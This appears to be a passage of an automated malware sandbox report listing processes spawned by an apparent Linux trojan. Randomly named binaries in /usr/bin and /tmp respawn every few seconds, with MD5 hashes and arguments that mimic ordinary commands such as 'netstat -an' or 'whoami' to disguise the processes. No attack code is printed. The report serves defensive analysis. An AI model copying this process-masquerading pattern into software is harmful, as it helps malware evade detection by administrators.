                                                            Arguments:/usr/bin/jyfcwmvcim ifconfig 9446
                                                            File size:625922 bytes
                                                            MD5 hash:8afc239e681af15bdc90d121acc9ded4

                                                            Start time:09:50:50
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jyfcwmvcim
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:8afc239e681af15bdc90d121acc9ded4

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nwaorjvecz
                                                            Arguments:/usr/bin/nwaorjvecz "ifconfig eth0" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:6e2bcd4f3e4b8df9abbda28156055f4b

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nwaorjvecz
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:6e2bcd4f3e4b8df9abbda28156055f4b

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nwaorjvecz
                                                            Arguments:/usr/bin/nwaorjvecz "netstat -an" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:6e2bcd4f3e4b8df9abbda28156055f4b

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nwaorjvecz
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:6e2bcd4f3e4b8df9abbda28156055f4b

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nwaorjvecz
                                                            Arguments:/usr/bin/nwaorjvecz "cd /etc" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:6e2bcd4f3e4b8df9abbda28156055f4b

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nwaorjvecz
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:6e2bcd4f3e4b8df9abbda28156055f4b

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nwaorjvecz
                                                            Arguments:/usr/bin/nwaorjvecz "echo \"find\"" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:6e2bcd4f3e4b8df9abbda28156055f4b

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nwaorjvecz
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:6e2bcd4f3e4b8df9abbda28156055f4b

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nwaorjvecz
                                                            Arguments:/usr/bin/nwaorjvecz uptime 9446
                                                            File size:625922 bytes
                                                            MD5 hash:6e2bcd4f3e4b8df9abbda28156055f4b

                                                            Start time:09:50:55
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nwaorjvecz
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:6e2bcd4f3e4b8df9abbda28156055f4b

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/cqsoclzfrt
                                                            Arguments:/usr/bin/cqsoclzfrt whoami 9446
                                                            File size:625922 bytes
                                                            MD5 hash:f7d314a270bd8415612f3c3e62c2e481

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/cqsoclzfrt
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:f7d314a270bd8415612f3c3e62c2e481

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/cqsoclzfrt
                                                            Arguments:/usr/bin/cqsoclzfrt "cd /etc" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:f7d314a270bd8415612f3c3e62c2e481

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/cqsoclzfrt
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:f7d314a270bd8415612f3c3e62c2e481

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/cqsoclzfrt
                                                            Arguments:/usr/bin/cqsoclzfrt pwd 9446
                                                            File size:625922 bytes
                                                            MD5 hash:f7d314a270bd8415612f3c3e62c2e481

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/cqsoclzfrt
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:f7d314a270bd8415612f3c3e62c2e481

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/cqsoclzfrt
                                                            Arguments:/usr/bin/cqsoclzfrt who 9446
                                                            File size:625922 bytes
                                                            MD5 hash:f7d314a270bd8415612f3c3e62c2e481

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/cqsoclzfrt
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:f7d314a270bd8415612f3c3e62c2e481

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/cqsoclzfrt
                                                            Arguments:/usr/bin/cqsoclzfrt su 9446
                                                            File size:625922 bytes
                                                            MD5 hash:f7d314a270bd8415612f3c3e62c2e481

                                                            Start time:09:51:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/cqsoclzfrt
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:f7d314a270bd8415612f3c3e62c2e481

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/udrzmjfbgf
                                                            Arguments:/usr/bin/udrzmjfbgf pwd 9446
                                                            File size:625933 bytes
                                                            MD5 hash:6ae6aafbe50076dc10606f80cdc189e9

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/udrzmjfbgf
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:6ae6aafbe50076dc10606f80cdc189e9

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/udrzmjfbgf
                                                            Arguments:/usr/bin/udrzmjfbgf top 9446
                                                            File size:625933 bytes
                                                            MD5 hash:6ae6aafbe50076dc10606f80cdc189e9

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/udrzmjfbgf
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:6ae6aafbe50076dc10606f80cdc189e9

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/udrzmjfbgf
                                                            Arguments:/usr/bin/udrzmjfbgf top 9446
                                                            File size:625933 bytes
                                                            MD5 hash:6ae6aafbe50076dc10606f80cdc189e9

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/udrzmjfbgf
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:6ae6aafbe50076dc10606f80cdc189e9

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/udrzmjfbgf
                                                            Arguments:/usr/bin/udrzmjfbgf su 9446
                                                            File size:625933 bytes
                                                            MD5 hash:6ae6aafbe50076dc10606f80cdc189e9

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/udrzmjfbgf
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:6ae6aafbe50076dc10606f80cdc189e9

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/udrzmjfbgf
                                                            Arguments:/usr/bin/udrzmjfbgf "cd /etc" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:6ae6aafbe50076dc10606f80cdc189e9

                                                            Start time:09:51:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/udrzmjfbgf
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:6ae6aafbe50076dc10606f80cdc189e9

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwgryggbpq
                                                            Arguments:/usr/bin/qwgryggbpq whoami 9446
                                                            File size:625933 bytes
                                                            MD5 hash:7c4643504cfef169ef231669a383f647

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwgryggbpq
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:7c4643504cfef169ef231669a383f647

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwgryggbpq
                                                            Arguments:/usr/bin/qwgryggbpq whoami 9446
                                                            File size:625933 bytes
                                                            MD5 hash:7c4643504cfef169ef231669a383f647

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwgryggbpq
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:7c4643504cfef169ef231669a383f647

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwgryggbpq
                                                            Arguments:/usr/bin/qwgryggbpq uptime 9446
                                                            File size:625933 bytes
                                                            MD5 hash:7c4643504cfef169ef231669a383f647

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwgryggbpq
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:7c4643504cfef169ef231669a383f647

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwgryggbpq
                                                            Arguments:/usr/bin/qwgryggbpq "cat resolv.conf" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:7c4643504cfef169ef231669a383f647

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwgryggbpq
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:7c4643504cfef169ef231669a383f647

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwgryggbpq
                                                            Arguments:/usr/bin/qwgryggbpq "ls -la" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:7c4643504cfef169ef231669a383f647

                                                            Start time:09:51:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qwgryggbpq
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:7c4643504cfef169ef231669a383f647

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thqvayvyih
                                                            Arguments:/usr/bin/thqvayvyih whoami 9446
                                                            File size:625933 bytes
                                                            MD5 hash:8a8795dac29dbd91def3756d2c65bc8d

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thqvayvyih
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:8a8795dac29dbd91def3756d2c65bc8d

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thqvayvyih
                                                            Arguments:/usr/bin/thqvayvyih uptime 9446
                                                            File size:625933 bytes
                                                            MD5 hash:8a8795dac29dbd91def3756d2c65bc8d

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thqvayvyih
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:8a8795dac29dbd91def3756d2c65bc8d

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thqvayvyih
                                                            Arguments:/usr/bin/thqvayvyih "netstat -antop" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:8a8795dac29dbd91def3756d2c65bc8d

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thqvayvyih
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:8a8795dac29dbd91def3756d2c65bc8d

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thqvayvyih
                                                            Arguments:/usr/bin/thqvayvyih "route -n" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:8a8795dac29dbd91def3756d2c65bc8d

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thqvayvyih
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:8a8795dac29dbd91def3756d2c65bc8d

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thqvayvyih
                                                            Arguments:/usr/bin/thqvayvyih "grep \"A\"" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:8a8795dac29dbd91def3756d2c65bc8d

                                                            Start time:09:51:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thqvayvyih
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:8a8795dac29dbd91def3756d2c65bc8d

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/fcpzadqmpt
                                                            Arguments:/usr/bin/fcpzadqmpt "cat resolv.conf" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:cc75cad92a9029b37a17aacb9017eeca

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/fcpzadqmpt
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:cc75cad92a9029b37a17aacb9017eeca

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/fcpzadqmpt
                                                            Arguments:/usr/bin/fcpzadqmpt "netstat -an" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:cc75cad92a9029b37a17aacb9017eeca

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/fcpzadqmpt
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:cc75cad92a9029b37a17aacb9017eeca

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/fcpzadqmpt
                                                            Arguments:/usr/bin/fcpzadqmpt "cd /etc" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:cc75cad92a9029b37a17aacb9017eeca

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/fcpzadqmpt
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:cc75cad92a9029b37a17aacb9017eeca

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/fcpzadqmpt
                                                            Arguments:/usr/bin/fcpzadqmpt gnome-terminal 9446
                                                            File size:625933 bytes
                                                            MD5 hash:cc75cad92a9029b37a17aacb9017eeca

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/fcpzadqmpt
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:cc75cad92a9029b37a17aacb9017eeca

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/fcpzadqmpt
                                                            Arguments:/usr/bin/fcpzadqmpt whoami 9446
                                                            File size:625933 bytes
                                                            MD5 hash:cc75cad92a9029b37a17aacb9017eeca

                                                            Start time:09:51:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/fcpzadqmpt
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:cc75cad92a9029b37a17aacb9017eeca

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ibtfyvoofm
                                                            Arguments:/usr/bin/ibtfyvoofm "netstat -an" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:03edbd21c1aa2730f07a68b2348159b3

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ibtfyvoofm
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:03edbd21c1aa2730f07a68b2348159b3

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ibtfyvoofm
                                                            Arguments:/usr/bin/ibtfyvoofm bash 9446
                                                            File size:625933 bytes
                                                            MD5 hash:03edbd21c1aa2730f07a68b2348159b3

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/ibtfyvoofm
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:03edbd21c1aa2730f07a68b2348159b3

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:51:25
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
